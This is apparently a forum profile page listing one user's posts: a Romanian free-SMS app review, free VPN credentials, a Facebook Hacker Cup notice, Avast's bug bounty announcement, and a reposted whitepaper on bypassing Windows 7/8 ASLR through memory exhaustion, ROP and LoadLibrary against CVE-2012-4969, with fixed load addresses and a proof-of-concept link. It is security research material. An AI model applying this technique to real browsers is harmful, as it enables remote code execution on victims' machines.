    V? aminti?i de febra SMS-urilor gratuite trimise de pe Internet? Î?i f?ceai un cont ?i putea s? trimi?i unul sau trei SMS-uri gratuite pe zi. Ea a trecut de mult, operatorii oferind la ora actual? un num?r foarte mare de SMS-uri în re?ea. În acest context apare aplica?ia SMS Gratuit Romania, o aplica?ie pentru Android care are descrierea în denumire. Ea necesit? conexiune la Internet ?i func?ioneaz? cu toate cele cinci re?ele de telefonie mobil? din ?ara noastr?. Instalarea se face foarte rapid ?i utilizatorul este întâmpinat cu o interfa?? simpl?. Num?rul de telefon acceptat începe cu 07 ?i poate fi preluat din lista de contacte. C?su?a pentru mesaj poate fi completat? cu 130 de caractere. Celelalte 30 sunt folosite de dezvoltator pentru a insera o reclam?. Acesta este compromisul pe care trebuie s?-l fac? utilizatorul. Înc? o reclam? a fost introdus? în interfa?a programului. Se pare c? acestea sunt sursele de venit pentru dezvoltator. Aplica?ia SMS Gratuit Romania este compatibil? cu Android 2.2 ?i mai nou ?i poate fi desc?rcat? de aici. Source
  22. Fi8sVrs

    Free VPN

    Fi8sVrs posted a topic in Free stuff

    VPN Type PPTP VPN Server Hostname freevpnhosting.com VPN Username freevpnhosting.com VPN Password http://freevpnhosting.com/#freevpnaccount update daily
  23. Fi8sVrs
    Facebook today announced that it has opened registration for the Hacker Cup, its annual competition for programmers with a $10,000 top prize, up from $5,000 last year, for the best of them all. Facebook holds the Hacker Cup in rounds, starting first online and then culminating in a final onsite round at Facebook’s HQ in Menlo Park, CA for the top 25 programmers. This years preliminary rounds will be held between January 25 and February 16. Facebook will fly the top 25 for the onsite final round that takes place March 22-23. The Hacker Cup is important for a couple of reasons. For one is shows that, although Facebook is pushing past one billion members of its social network and is now one of the world’s biggest public tech companies, it is committed to trying to staying close to its Hacker Way roots. This is important for it to stay innovative, but it also helps keep Facebook in touch with the world community of top, smart programmers — an obvious route to tapping for top engineering talent. Facebook says that those who registered for a previous year are automatically registered for the competition year, although they still need to check their information is up-to-date. There is no limit to the number of people registering for the competition, as long as you sign up by the end of the first round, on the 27th of January. But there are a few limits on who can participate. Facebook notes in its rules and regulations that you need to be registered on Facebook yourself, you need to be 18 or older, and you cannot be resident in Quebec (!) or any other place where these kinds of competitions are prohibited by law. You also need to provide your real name, postal address, phone number, email address, and date of birth, which may weed out a few Anonymous types, as brilliant as some of them may be. The competition will follow the same form as in past years. Rather than free-form hackathon-style hacking, contestants are given problem sets that they need to solve. Answers come by way of source code and an output file to show how it works. They will be judged on how well they can come up with the solution in a set period of time, via a timer in the input set. They have six minutes to submit the source code and output file — and they can submit multiple answers in that time. Last year, the Hacker Cup attracted 8,000 hopefuls from 150 countries, but the final 25 came from a relatively narrow list of countries – Russia, Germany, Poland, Ukraine, China, South Korea, Japan, Taiwan, and the U.S., with the winner, Roman Andreev, hailing from Russia. You can read more about him and last year’s competition here. Just as it is telling that Facebook runs a Hacker Cup, it will be telling to see how many enter this year and how the country spread for finalists compares. Register FAQ Source
  24. Fi8sVrs
    Hello Avast fans! It is my pleasure to officially announce the new Avast bug bounty program. As a security company, we very much realize that security bugs in software are reality. But we also realize that companies that are able to use their user communities to find and fix bugs are generally more successful that those that don’t. Therefore, we have decided to reward individuals who help us find and fix security-related bugs in our own software. This makes us probably the first security vendor with a reward program like this: I think it’s mainly because the other companies generally take the position that ‘Hey, we’re a security company. So we know security and it can’t happen to us.’ But in reality, that’s not what’s happening. Just look at bugtraq or the CVE databases and you will find that security software is no more immune to these issues than any other programs. A bit of irony, given that people generally install security software to fight security issues in the first place, isn’t it? We at Avast take this very seriously. We know that being a market leader (Avast has more users than any other AV company in the world), we’re a very attractive target for the attackers. So, here’s our call to action: let’s unite and find and fix those bugs before the bad guys do! Here’s how it works: The bounty program is designed for security-related bugs only. Sorry, we’re not paying for other types of issues like bugs in the UI, localization etc. (nevertheless, if you find such a bug, we will of course very much appreciate if you report it). This program is currently intended only for our product, i.e. not the website etc. We’re generally only interested in these types of bugs (in the order of importance): Remote code execution. These are the most critical bugs. Local privilege escalation. That is, using Avast to e.g. gain admin rights from a non-admin account. Denial-of-service (DoS). In case of Avast, that would typically be BSODs or crashes of the AvastSvc.exe process. Escapes from the avast! Sandbox (via bugs in our code) Certain scanner bypasses. These include include straightforward, clear bypasses (i.e. scenarios that lead to direct infection, with no additional user input), as opposed to things like deficiencies in the unpacking engine etc. In other words, we’re interested only in cases that cannot be mitigated by adding a new virus definition (please don’t report undetected malware) Other bugs with serious security implications (will be considered on a case by case basis). The base payment is $200 per bug. Depending on the criticality of the bug (as well as its neatness) the bounty will go much higher (each bug will be judged independently by a panel of experts). Remote code execution bugs will pay at least $3,000 – $5,000 or more. We might change these ranges based on the number and quality of incoming reports. Generally, the less reports we will get, the higher the bounty will go. We will only pay for bugs in Avast itself. For example, if you find a bug in a Microsoft library (even if it’s used by Avast), please report it to Microsoft instead (it would be great if you could also notify us, but unfortunately, we cannot offer any reward in such cases). The program is currently limited to consumer Windows versions of Avast (i.e.: Avast Free Antivirus, Avast Pro Antivirus, and Avast Internet Security). Only bugs in the latest shipping versions of these products will be considered. Payment will be done preferably by PayPal. If you can’t accept PayPal (e.g. because it doesn’t work in your country), please get in touch with us and we will try to figure out something else. Because of certain legal restrictions, we cannot accept submissions from the following countries: Iran, Syria, Cuba, North Korea and Sudan. It is the researcher’s own responsibility to pay any taxes and other applicable fees in their country of residence. In order to be eligible for the bounty, the bug must be original and previously unreported. If two or more researchers happen to find the same bug, the bounty will be paid only to the one whose submission came in first. You must not publicly disclose the bug until after an updated version of Avast that fixes the bug is released. Otherwise, the bounty will not be paid. The bounty will be paid only after we fix the issue (or, in specific cases, decide to not fix it). Some bugs may take longer to correct. We will do our best to fix any critical bugs in a timely fashion. We appreciate your patience. Employees of AVAST and their close relatives (parents, siblings, children, or spouse) and AVAST business partners, agencies, distributors, and their employees are excluded from this program. We reserve the right to change the rules of the program or to cancel it at any time. How to report a bug and qualify for the bounty: Please submit the bug to a special email address bugs@avast.com If you’d like to encrypt your email (recommended), please use this PGP key. A good bug report needs to contain sufficient information to reliably reproduce the bug on our side. Please include all information that may be relevant – your exact environment, detailed bug description, sample code (if applicable) etc. It also needs to contain a decent analysis – this is a program designed for security researchers and software developers and we expect certain quality level. You will receive a response from an Avast team member acknowledging receipt of your email, typically within 24 hrs. If you do not receive a response, please do not assume we’re ignoring you – we will do our best to follow up with you asap. Also, in such a case it is possible your email didn’t make it through a spam filter. Finally, I’d like to say thanks to everyone who helps to find and fix bugs in our products. Hopefully, this new reward program will take this initiative to a whole new level. Happy [bug]hunting! P.S. The bug bounty rules are also available on our main website here. Via: avast! blog Introducing the New Avast Bug Bounty Program
      • 1
      • Upvote
  25. Fi8sVrs
    ================================================== Attacking the Windows 7/8 Address Space Randomization Copyright © 2013 Kingcope "Was nicht passt wird passend gemacht" (English: "If it don't fit, use a bigger hammer.") German phrase ================================================== Synopsis - What this text is all about ================================================== The following text is what looks like an attempt to circumvent windows 7 and windows 8 memory protections in order to execute arbritrary assembly code. The presented methods are in particular useful for client-side attacks as used for example in browser exploits. The topic that is discussed is a very complex one. At the time I started the research I thought the idea behind the attack will be applied to real-world scenarios quick and easy. I had to be convinced by the opposite. The research was done without knowing much about the real internals of the windows memory space protection but rather using brute force, trial & failure in order to achieve what will be presented in the upcoming text. Be warned - the methods to attack the protection mechanisms hereby presented are not failsafe and can be improved. Tough in many cases it is possible to completely bypass Windows 7 and especially Windows 8 ASLR by using the techniques. Target Software ================================================== The used operating systems are Windows 7 and Windows 8, the included PoC code runs on 32 Bits platforms and exploits Internet Explorer 8. All can be applied to Internet Explorer 9 with modifications to the PoC code. For Internet Explorer 10 the memory protection bypass is included and demonstrated in the PoC. Executing code through return oriented programming is left as an excercise to the reader. The PoC makes use of the following vulnerability and therefore for testing the PoC the patch must not be installed. MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability This vulnerability is identified as CVE-2012-4969. It might be possible to use the very same method to exploit other browsers as other browsers give similar opportunities to the exploit writer. I don't want to sound crazy but even other Operating Systems might be affected by this, yet unconfirmed. Current ways to exploit browsers ================================================== Today alot of attention is brought to client side exploits especially inside web browsers. Normally the exploitation is done through the old known method of spraying the heap. This is done by populating the heap with nopsleds and actual shellcode. By filling the heap in this way a heap overrun can be used to rewrite the instruction pointer of the processor to a known heap address where the shellcode resides quite deterministic. In order to bypass protections like Data Execution Prevention a ROP chain is built. There are exploits that install a stack pivot in the first place in order to exploit a heap overrun as it would be a stack based buffer overrun using a "return into code" technique. The mentioned modern ways to exploit heap corruptions are documented very well. When it comes to Windows 7 and Windows 8 exploitation the exploit writer will face the obstacle of randomized memory space. There remains the simple question where do I jump to when having control over the instruction pointer? It might by possible to leak memory directly from the web browser and use this information to gain information about the correct offsets and executable code sections. This requires knowledge about a memory leak bug tough and therefore is not used alot. Another option is to use old DLLs that do not have their image bases randomized, for example older Java versions are known to have un- randomized image bases. This option requires the use of third-party software that has to be installed. This text will present a new way to deal with the 'where do i jump when I have code execution' problem. Introduction to Windows memory randomization ================================================== Windows 7 and Windows 8 have a special security relevant protection programmed in. The so called A.S.L.R or '[A]ddress pace [L]ayout [R]andomization' that does nothing more than randomize every piece of memory, say its offsets. For example the program image is randomized, the DLLs the program uses are randomized too. There is not a single piece of memory from what one could say after a reboot the data in the memory space will be at the same place as before the reboot. The addresses even change when a program is restarted. ActiveX and other useful features ================================================== Web browser exploits have many advantages to other kinds of exploits. For example JavaScript code can be executed inside the webbrowser. This is also the tool that heap spraying makes use of. Let us have a look at what happens if we load an ActiveX object dynamically when a web page loads. The ActiveX object we will load is the Windows Media Player control. This can either be done using JavaScript or plain HTML code. At the point the ActiveX object is loaded Windows will internally load the DLLs into memory space if they previously where not inside the programs memory space. The offset of loading the DLLs in memory space is completely random. At least it should be. Let us now see how we can manage to put a DLL into memory space at a fixed address by loading an ActiveX object at runtime. Exhausting memory space and squeezing DLLs into memory ================================================== The nuts and bolts of what is presented here is the idea that DLLs are loaded into memory space if there is memory available, and if there is no memory or only small amounts of memory available then the DLL will be put into the remaining memory hole. This sounds simple. And it works, we can load a DLL into a remaining memory hole. First of all the exploit writer has to code a javascript routine that does fill memory until the memory boundary is hit and a javascript exception is raised. When the memory is filled up the installed javascript exception handler will execute javascript code that frees small chunks of memory in several steps, each step the javascript code will try to load an ActiveX object. The result is that the DLL (sometimes there are several DLLs loaded for an ActiveX object) will be loaded at a predictable address. This means that now the exploit writer has a predictable address to jump to and the 'where do i jump when I have code execution' problem is solved. One problem the method has is that Windows will become unresponsive at the time memory is exhausted but will resume normal operation after the DLL is loaded at a fixed address and the memory is freed using the javascript code. Summary of exploitation stages: * Fill the heap with random bytes until all memory is used up. During the heap filling stage Windows might become unresponsive and will relax soon afterwards ·* Free small heap blocks one by one and try adding a DLL (for example by using a new ActiveX Object that is loadable without a warning by Internet Explorer) This DLL (and the DLLs that are loaded from it) will be squeezed into the remaining memory region (the space that was freed by us through JavaScript). This address is fixed and predictable for us to jump to * Free the remaining memory blocks which were allocated before * Spray the heap using the well known method * Finally trigger the heap corruption and jump to this fixed DLL base to execute our code in a ROP manner. To say it abstract the exploit writer has to be especially careful about the timing in the JavaScript code and about the memory the exploit routines themselves take up. ROP chain and the LoadLibrary API ================================================== At the time we have loaded the DLL at a predictable address it is possible to use a ROP chain in order to execute shellcode. The PoC code goes a much simpler path. It will use a short ROP chain and call the LoadLibrary API that is contained in the Windows Media Player DLLs. This way another DLL can be fetched from a WebDAV share and loaded into the Internet Explorer memory space in order to fully execute arbritrary code. Windows 8 singularity ================================================== Testcases have shown that Windows 8 behaves more vulnerable to the method than Windows 7. In Windows 8 the DLL will be loaded at the very low address 0x10000 and more reliable than in Windows 7. Windows 7 is much more persistant in loading the DLL at a fixed memory address. The testcases for Windows 7 have shown that the DLL will be loaded at the predictable address at least 7 out of 10 times of loading the exploit. The PoC codes ================================================== There are two different PoCs, one for Windows 7 and one for Windows 8. The Windows 8 code is a slightly modified version of the Windows 7 code. Please note that Windows Defender detects the Win8 PoC as being an exploit and blocks execution. The parts which are detectable by windows defender are not needed for the A.S.L.R. attack to work. Please disable Windows Defender if you test the Windows 8 PoC for now. The Windows 7 PoC is successful if it loads gdiplus.dll at the predictable fixed offset 0x7F7F0000. If you are lucky and have set up the exploit appropriately the payload will be executed, which is currently a MessageBox that pops up. The Windows 8 PoC is successful if it loads gdiplus.dll at the predictable fixed offset 0x10000. Please note that wmp.dll (Windows Media Player DLL) and gdiplus.dll should not be in the Internet Explorer address space prior to executing the PoC for it to succeed. As a final note, the PoC does not depend on the ActiveX control that is added it can be changed with some effort to load a different DLL. Here are the mappings I tested when the PoC succeeds: Windows 7 32-Bit Service Pack 0 & Service Pack 1 across reboots: Address Size Owner Section Contains Type Access 7F7F0000 00001000 gdiplus PE header Imag R RWE 7F7F1000 0016B000 gdiplus .text code,imports Imag R RWE 7F95C000 00008000 gdiplus .data data Imag R RWE 7F964000 00001000 gdiplus Shared Imag R RWE 7F965000 00012000 gdiplus .rsrc resources Imag R RWE 7F977000 00009000 gdiplus .reloc relocations Imag R RWE Windows 8 32-Bit across reboots: Address Size Owner Section Contains Type Access 00010000 00001000 gdiplus PE header Imag R RWE 00011000 00142000 gdiplus .text code,exports Imag R RWE 00153000 00002000 gdiplus .data Imag R RWE 00155000 00003000 gdiplus .idata imports Imag R RWE 00158000 00012000 gdiplus .rsrc resources Imag R RWE 0016A000 00009000 gdiplus .reloc relocations Imag R RWE Enjoy! This archive has a whitepaper that discusses research and methods used to circumvent Microsoft Windows 7 and 8 memory protections in order to execute arbitrary assembly code. Proof of concepts are also provided. Download http://packetstormsecurity.com/files/119835/Attacking-The-Windows-7-8-Address-Space-Randomization.html
×
×
  • Create New...